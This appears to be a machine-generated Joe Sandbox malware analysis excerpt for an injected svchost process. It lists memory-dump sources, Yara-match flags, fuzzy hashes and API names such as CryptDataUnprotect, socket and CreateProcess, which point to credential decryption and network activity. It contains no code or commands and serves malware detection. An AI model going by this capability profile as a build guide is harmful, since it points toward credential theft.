                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                                                                                                                                                                                                          • Instruction ID: ae806501c284ec1956d96b7f0c5678af417c7d98d03ed5a044222ab5e32484d2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC31AF3071CA488FE748EB6CD85966BB7E1FB99311F10453EF54AC3291DA38D8018792

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b6ed53fab85cf22cf76427c2e966a0a197060846b061c1a52c71d60efdb2ca86
                                                                                                                                                                                                                                                                                                          • Instruction ID: 25f494acc884a9643d7420aa0927afbf57982972234888513f41771bc781ee57
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6ed53fab85cf22cf76427c2e966a0a197060846b061c1a52c71d60efdb2ca86
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C918931658A584BF73C9B28C8D1BF977D1F795305F14426EE4CBC2282EAB4D9178B81

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1778838933-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF426ABC0F7), ref: 00007DF426ABE160
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: freemalloc
                                                                                                                                                                                                                                                                                                          • String ID: CeP$,$,
                                                                                                                                                                                                                                                                                                          • API String ID: 3061335427-2996039724
                                                                                                                                                                                                                                                                                                          • Opcode ID: e353c29c0b88583718f6329c71bf4d43162d928d93945ef273b572fc5238f9b0
                                                                                                                                                                                                                                                                                                          • Instruction ID: f6169363a6330809aaa816c7c46cf954cb7a8d89e389c6b866fa710879b9304b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e353c29c0b88583718f6329c71bf4d43162d928d93945ef273b572fc5238f9b0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32A18730658B189BEB78EF28D4E5BE973D1FB98310F10455DE44BC3292DE74E8528B85
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateFile$AcceptConnectMappingPortcallocfree
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4186280995-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4a9994714ac5d85e04743317fcad2e6d80c68f1514738ca0430bfad623492367
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED1407151CB888BD765DF28D8856ABB7E1FB95310F10463EE58FC2192EF34A505CB82
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: freemalloc
                                                                                                                                                                                                                                                                                                          • String ID: x
                                                                                                                                                                                                                                                                                                          • API String ID: 3061335427-2363233923
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                                                                                                                                                                                                          • Instruction ID: be0524b287bd0317c6d8f48bd58f76c7551f889cf2370d97e6fcbc4bd6b246d2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FB18E31A1CA844AE729AB5898956EBB7E1FFD5310F50057EE0CFC3187DD38E605C686
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.1671053578.000001C276070000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C276070000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_1c276070000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual$CloseFileHandleView
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 867161474-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 891408fe0d1448a39d4c9211b5b17748033e0253f96817e96866cc630ca6b417
                                                                                                                                                                                                                                                                                                          • Instruction ID: b4fa266941f2a0daecf8cd37a37f49f084840e99d33e614f13113261d200aacc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 891408fe0d1448a39d4c9211b5b17748033e0253f96817e96866cc630ca6b417
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17718BB1648B0A5FEB68DF28D899BA6B3D1FB94310F50462DE48BC3281DF70E94187C1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                                                                                                                                          • String ID: 0$@
                                                                                                                                                                                                                                                                                                          • API String ID: 2635317215-1545510068
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7c97ea553c2892a25dbf8138126a84db5bc42a7b477b3d27da132530e99906c8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 65e82485401768b1f5e4233b42454eacbb9a4421d324295337638fcf8c79d620
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c97ea553c2892a25dbf8138126a84db5bc42a7b477b3d27da132530e99906c8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0417330608B498FE754EB58D848B6BB7E4FBA9351F14052EE94AC3290EB79D844C792

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: NJI@
                                                                                                                                                                                                                                                                                                          • API String ID: 0-1894075864
                                                                                                                                                                                                                                                                                                          • Opcode ID: d45665fd503c042bbd1cddf3e76509b083df421fb529cf4e6337dc35805fb2d8
                                                                                                                                                                                                                                                                                                          • Instruction ID: c36c18d302e7fcb24499de79db36656e0ff3649c55712bb3d9c842f7c413817f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d45665fd503c042bbd1cddf3e76509b083df421fb529cf4e6337dc35805fb2d8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87E16D7051C7D48BE3759F2988917EBBBE1FB99302F00492EE4CAC2281EB749501CB83
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.1771251519.000001C278320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C2782E0000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000F.00000003.1674864872.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_1c2782e0000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                          • String ID: x
                                                                                                                                                                                                                                                                                                          • API String ID: 3298025750-2363233923
                                                                                                                                                                                                                                                                                                          • Opcode ID: d66a01202ac467ddf61ba4bfa63189e55d6692710d42d0a16d7a77e600116e1c
                                                                                                                                                                                                                                                                                                          • Instruction ID: bc871180a1a2167b5e6ab96b9f900fe2981286a2e2db0616bf1ce96d183c07e6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d66a01202ac467ddf61ba4bfa63189e55d6692710d42d0a16d7a77e600116e1c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 519114726443E147FB30AA2DE484FEEBBA1F395B84F400012DB9657E95EABCC646C741

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID: !RHY
• API String ID: 621844428-2095432132
Strings
Memory Dump Source
• Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
Similarity
• API ID:
• String ID: X
• API String ID: 0-3081909835
APIs
Memory Dump Source
• Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
Similarity
• API ID: File$CreateReadmalloc
• String ID:
• API String ID: 3950102678-0
APIs
Memory Dump Source
• Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
Similarity
• API ID: File$CreateRead
• String ID:
• API String ID: 3388366904-0
APIs
Memory Dump Source
• Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
Similarity
• API ID: Completion$CreateFileModesNotificationPort
• String ID:
• API String ID: 3755109111-0
APIs
Memory Dump Source
• Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
Similarity
• API ID: Completion$CreateFileModesNotificationPort
• String ID:
• API String ID: 3755109111-0
APIs
Memory Dump Source
• Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
Similarity
• API ID: File$CreateRead
• String ID:
• API String ID: 3388366904-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Path$AcceptConnectNameName_Portcallocfree
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3949126726-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateFileMapping
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 524692379-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 98920635-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • TlsFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000000,00007DF426AA37B8), ref: 00007DF426AA85F1
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3978063606-0


                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 000001C27640C440: VirtualFree.KERNELBASE(?,?,?,?,?,?,?,000001C2764097CF), ref: 000001C27640C4D8
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32 ref: 000001C276409834
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorFreeModeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3123725612-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c558a3bee63eb8d82cfee7bb6036631f102c00f5edc4b5b2d839b26d2bc08f01
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4f1ca75175b1d007e37f5c421d2f4717d7ca5269f1e73066295b427000452b2a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c558a3bee63eb8d82cfee7bb6036631f102c00f5edc4b5b2d839b26d2bc08f01
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88319331258B184BFB79FB69D8D1FD973E5EBA4300F400558F44AC7292EE74D9108781
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1e60da0387532ed08b6b2c4227f9f253aabf7bfeb9f956a08f44f065dffbf384
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D318121B1C9855BEB98FB689C9256E72F2EF5A320B50043BE00FC32D2D91CAD458686
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 98920635-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                                                                                                                                                                                                          • Instruction ID: 477e353905b242427a4d2d2dfd556d69f88120ffb264a4c86bf1cef69db814dc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C215630B08A444FEF58EB789C8D66673E1FB56335F10467AE82FC72E6DA289C41C651
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: getaddrinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 300660673-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 92ecc9ca934e577d507b017bde325cc935388cdbe6c37a89e0ee4a728f355ab4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08314B70618A488FEB54DF28C898A5673F1FF99714F10417AD84ED7291DB39E802CF41
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 98920635-0
